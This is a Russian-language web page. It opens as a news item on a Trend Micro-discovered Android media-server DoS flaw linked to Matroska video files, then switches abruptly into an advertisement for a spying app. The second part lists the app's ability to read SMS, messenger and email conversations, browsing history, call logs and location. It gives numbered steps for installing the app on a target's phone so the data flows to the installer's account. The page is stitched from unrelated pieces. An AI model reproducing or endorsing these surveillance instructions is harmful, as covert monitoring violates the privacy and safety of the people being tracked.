В Android обнаружена DoS-брешь в безопасности

9a1870a6f6dcc9df4586c000167c8018Обнаружить подобную брешь удалось исследователям из компании Trend Micro, которые проанализировали различные причины завершения работы устройства в аварийном режиме. Оказалось, что в исходном коде Google Android имеется серьёзная уязвимость, которая позволяет удалённо запускать DoS-атаку. Это приводит к завершению работы смартфона, вне зависимости от действий пользователя. Исследования показывают, что грамотно проведённое злоумышленником нападение может привезти к тому, что мобильник станет совершенно неработоспособным.

Мобильник перестанет реагировать на прикосновения к сенсорному экрану, он не сможет воспроизводить звуки, а владелец не ответит на входящие звонки, да и набрать номер тоже не сможет. Остаётся лишь перезагрузить трубку, чтобы освободить оперативную память и очистить его от атаки. Для заражения смартфона достаточно посетить вредоносную web-страницу, на которой имеется необходимый код. Либо пользователь может случайно скачать мобильное приложение из неофициального магазина, где уже будет заложена вредоносная программная среда. Избавиться от неё сложно.

Сотрудники Google оперативно отреагировали на проведённое Trend Micro исследование, но на момент написания данной статьи ещё не выпустили обновление безопасности для ОС. Разработчики сетуют на необходимость детального анализа открывшейся бреши, дабы выявить все слабые места и устранить проблему окончательно. Уязвимость обнаружена во встроенной Android-службе media server, связана она с контейнером видео Matroska. Ошибка с индексированием файлов и послужила причиной этой проблемы.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.